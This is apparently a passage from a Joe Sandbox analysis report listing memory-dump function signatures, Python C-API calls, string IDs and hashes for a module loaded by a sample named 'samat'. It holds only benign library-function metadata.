                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_$Long$OccurredString$ClearLong_$CharDeallocFormatNumber_Unicode_UnsignedWide
                                                                                                                                                                                                                                                                                      • String ID: Resource id/name must be unicode or int in the range 0-65536
                                                                                                                                                                                                                                                                                      • API String ID: 293670993-4091729669
                                                                                                                                                                                                                                                                                      • Opcode ID: 555b23e77155b6422bb856a96e125e404c24bcfd3c1006e6b91ad9e20b969513
                                                                                                                                                                                                                                                                                      • Instruction ID: bd4327f135e3b1e1a1d42780dc140e9336a990c4a76a722c32cf5c2e2d9e8195
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 555b23e77155b6422bb856a96e125e404c24bcfd3c1006e6b91ad9e20b969513
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADF04F62B1874281FB509B6AF94437D12A2AF4CFC8F845031EB5D866AAEE3CD4818300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8AD90: PyErr_SetString.PYTHON313 ref: 00007FF8B7E8ADCF
                                                                                                                                                                                                                                                                                      • PyErr_Clear.PYTHON313 ref: 00007FF8B7E8CFBC
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyNumber_Long.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEC5
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CED3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyLong_AsLongLong.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEE1
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEF0
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyErr_Clear.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEFB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyLong_AsUnsignedLongLong.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF04
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF13
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: _Py_Dealloc.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF2C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyErr_Format.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF4B
                                                                                                                                                                                                                                                                                      • PyErr_SetString.PYTHON313 ref: 00007FF8B7E8CFF2
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • Resource id/name must be string or int in the range 0-65536, xrefs: 00007FF8B7E8CFE1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_$Long$Occurred$ClearLong_String$DeallocFormatNumber_Unsigned
                                                                                                                                                                                                                                                                                      • String ID: Resource id/name must be string or int in the range 0-65536
                                                                                                                                                                                                                                                                                      • API String ID: 286819204-907244015
                                                                                                                                                                                                                                                                                      • Opcode ID: 31b1ca96400902001310dfbad8b15d17db623f0623437432e6c4c09ff0a382c6
                                                                                                                                                                                                                                                                                      • Instruction ID: 4ba3de3c5ec4d82b907444a4f1169451370f2e38b0adc8e3bec94d850b07a305
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31b1ca96400902001310dfbad8b15d17db623f0623437432e6c4c09ff0a382c6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3F04F22B1874291FB519B6AF94437D1291EF48FC8F854031EB5D866A6EE3CD4818300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Capsule_ImportReadyType_
                                                                                                                                                                                                                                                                                      • String ID: datetime.datetime_CAPI
                                                                                                                                                                                                                                                                                      • API String ID: 2581296196-711417590
                                                                                                                                                                                                                                                                                      • Opcode ID: 71f6e2cd8b549125eda3018e95e8dee2b3e503f95c455a05ccb1b3c9eda9d859
                                                                                                                                                                                                                                                                                      • Instruction ID: 7ca7eed74ef571aac8612cc8102ae7c3e2e3f32726053a993f138cbc6c52a77e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71f6e2cd8b549125eda3018e95e8dee2b3e503f95c455a05ccb1b3c9eda9d859
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1701A879A09B4681EA05CB59E89006933B4FF98FD0F998631EA5D83370DF3CD496C210
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Long$Arg_FromLong_ParseTuple
                                                                                                                                                                                                                                                                                      • String ID: :Detach
                                                                                                                                                                                                                                                                                      • API String ID: 1152936543-4103459575
                                                                                                                                                                                                                                                                                      • Opcode ID: f8836bdbb5d1f36a60bbf496dee83d82e6e9fc9586328ff7cf63e7ebb02f3342
                                                                                                                                                                                                                                                                                      • Instruction ID: 6f8723c0d68ed750c791c9296e693954ebcf3485ffaf7f7b1f0579751084525b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8836bdbb5d1f36a60bbf496dee83d82e6e9fc9586328ff7cf63e7ebb02f3342
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6DF01C22B18B4182FF954B69FA8036D62E1BF48FC0F885435EA1D87768FE7CD5948300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_ParseReferenceTuple
                                                                                                                                                                                                                                                                                      • String ID: :WAVEFORMATEX
                                                                                                                                                                                                                                                                                      • API String ID: 709158290-1364142124
                                                                                                                                                                                                                                                                                      • Opcode ID: 669a32538ec6f923bfe1ee86a65c60c36bc7eb7b96e35d950023d8bde529439e
                                                                                                                                                                                                                                                                                      • Instruction ID: 4d97a64daef4eea1b6597d3d8526af44ea81809169fb2115b593c9eb58818f18
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 669a32538ec6f923bfe1ee86a65c60c36bc7eb7b96e35d950023d8bde529439e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5BF03A26E15B4282EB149F69E84016D22A4BF8DF84FC55635D74D86325EF3CD1948300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AttrObject_StringSubtypeType_
                                                                                                                                                                                                                                                                                      • String ID: timetuple
                                                                                                                                                                                                                                                                                      • API String ID: 1421930220-3328721318
                                                                                                                                                                                                                                                                                      • Opcode ID: 3f8d4b43d52be91b307c0cdd37ca4129189ec392190273ab2ef4856b4f036eae
                                                                                                                                                                                                                                                                                      • Instruction ID: 33940bdc16e411ce48383681e5b4cebc50eea157b9165a85ccf7f1e60794ffd6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f8d4b43d52be91b307c0cdd37ca4129189ec392190273ab2ef4856b4f036eae
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0E0E5A2F4970692FF148BAAE88013913A09F58FE1F886070DA4D4A371EF6DD9D18200
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_ParseTuple
                                                                                                                                                                                                                                                                                      • String ID: @$|ii:ACL
                                                                                                                                                                                                                                                                                      • API String ID: 3371842430-2672190651
                                                                                                                                                                                                                                                                                      • Opcode ID: a334b7dfaa821d41b7e8f3be6c7a66ccbd714a8d02a99bdf497d0802bf0223a7
                                                                                                                                                                                                                                                                                      • Instruction ID: c03d4c84526696c8f6e2877ecc974910d1ccec2b3ec8db218bda9cc6afcc8812
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a334b7dfaa821d41b7e8f3be6c7a66ccbd714a8d02a99bdf497d0802bf0223a7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66F01265A0878186E600DB94E40125DA7A4FF84BD4FC04034EB4D57775EFBCD119CB40
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_ParseTupleValid
                                                                                                                                                                                                                                                                                      • String ID: :IsValid
                                                                                                                                                                                                                                                                                      • API String ID: 2541654197-2800628479
                                                                                                                                                                                                                                                                                      • Opcode ID: c205e6c6629add5205025c12b4e55ecd6f97f98ddf72bd804bbb35d485ae357b
                                                                                                                                                                                                                                                                                      • Instruction ID: 02b7030897fbd98458db8f2f83b3f39a371228d5d7f1e736a2251a3433e618c5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c205e6c6629add5205025c12b4e55ecd6f97f98ddf72bd804bbb35d485ae357b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07E0EC52F19A0682EB585BEAAC5007912D5AF48FD5F441434DE1D86371EE3CD5E58200
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_AuthorityCountParseTuple
                                                                                                                                                                                                                                                                                      • String ID: :GetSubAuthorityCount
                                                                                                                                                                                                                                                                                      • API String ID: 4231099721-2020981275
                                                                                                                                                                                                                                                                                      • Opcode ID: da784ef745ded8b10977a995322f8d6846b7cc8515693475c2a544ad34ee81bc
                                                                                                                                                                                                                                                                                      • Instruction ID: db6ed9fdc6a48f6b4dc175427ada86cd3fd9f6a0e9248c73d3b3a94a25a124bd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da784ef745ded8b10977a995322f8d6846b7cc8515693475c2a544ad34ee81bc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20E08652F0970282EB0447EAEC5007922909F48FC1F441431DF1D863B1ED3C95E18300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_LengthParseTuple
                                                                                                                                                                                                                                                                                      • String ID: :GetLength
                                                                                                                                                                                                                                                                                      • API String ID: 1894485733-295138441
                                                                                                                                                                                                                                                                                      • Opcode ID: 3c69dd88cdf965b284251de54f93c677440366d6c9c987ed12ccb91b8556208d
                                                                                                                                                                                                                                                                                      • Instruction ID: 831663fb2e0d667f3000a9cdf678100ed92dd1aa7b9dbbac29ba22efd7312ca6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c69dd88cdf965b284251de54f93c677440366d6c9c987ed12ccb91b8556208d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46E0EC52F19A4682EB584BFAAC5007D2294AF48FD4F841431DE1D86371EE3CD5E58200
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_DescriptorLengthParseSecurityTuple
                                                                                                                                                                                                                                                                                      • String ID: :GetLength
                                                                                                                                                                                                                                                                                      • API String ID: 840013968-295138441
                                                                                                                                                                                                                                                                                      • Opcode ID: 4b502b493f44923badd855b2eabefab93c9aa0276462f2218449576b2ef85afb
                                                                                                                                                                                                                                                                                      • Instruction ID: 6fb943e9224b3cd24151d73ca10c34cc4520082ccd162234d3fc767f33361c6a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b502b493f44923badd855b2eabefab93c9aa0276462f2218449576b2ef85afb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DAE0EC52F29B4682FB584BFAAC510791294AF48FD4F841431DE1D863B1EE3CD5E58300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_DescriptorParseSecurityTupleValid
                                                                                                                                                                                                                                                                                      • String ID: :IsValid
                                                                                                                                                                                                                                                                                      • API String ID: 1292091245-2800628479
                                                                                                                                                                                                                                                                                      • Opcode ID: 62955e74c7143c37824a64132e3129fc9fe357e4491e50685c69f37ce866d45b
                                                                                                                                                                                                                                                                                      • Instruction ID: 293127e2998e692997dda712e0a291843ebb762425aa3e8ffdd7076254ad7985
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62955e74c7143c37824a64132e3129fc9fe357e4491e50685c69f37ce866d45b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABE0EC52F19A0682EB585BEAAC510B91294AF48FD4F441431DE1D863B1EE7CD5E58300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_ParseTupleValid
                                                                                                                                                                                                                                                                                      • String ID: :IsValid
                                                                                                                                                                                                                                                                                      • API String ID: 2541654197-2800628479
                                                                                                                                                                                                                                                                                      • Opcode ID: 0b4349dba64da8df61b8a50073b5194a98f0e01b25cefaace262f8ea508d1991
                                                                                                                                                                                                                                                                                      • Instruction ID: 9283a28fbaf224360d5de86995fabe34e22938de8d312bf901883c91ed708ce1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b4349dba64da8df61b8a50073b5194a98f0e01b25cefaace262f8ea508d1991
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6E0EC52F19B0682EB585BFABC540B92294AF48FD4F441430DE1D86371EE3CD5E58200
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_String
                                                                                                                                                                                                                                                                                      • String ID: POINT must be a tuple of 2 ints (x,y)$ll;POINT must be a tuple of 2 ints (x,y)
                                                                                                                                                                                                                                                                                      • API String ID: 1450464846-334919720
                                                                                                                                                                                                                                                                                      • Opcode ID: bb86c514a6f5b80bd517a3355d44e97f5c100e51a03659f47b0f39897d6151d1
                                                                                                                                                                                                                                                                                      • Instruction ID: 4f212a5575a2c39a94c912f66042fa1f00341fb98305572510ede8dc428f7e0c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb86c514a6f5b80bd517a3355d44e97f5c100e51a03659f47b0f39897d6151d1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C3E01AA2E09B46E1EA048B9DD8852A923A0FF49FC8FC59436DB0D47271DE7CD199C301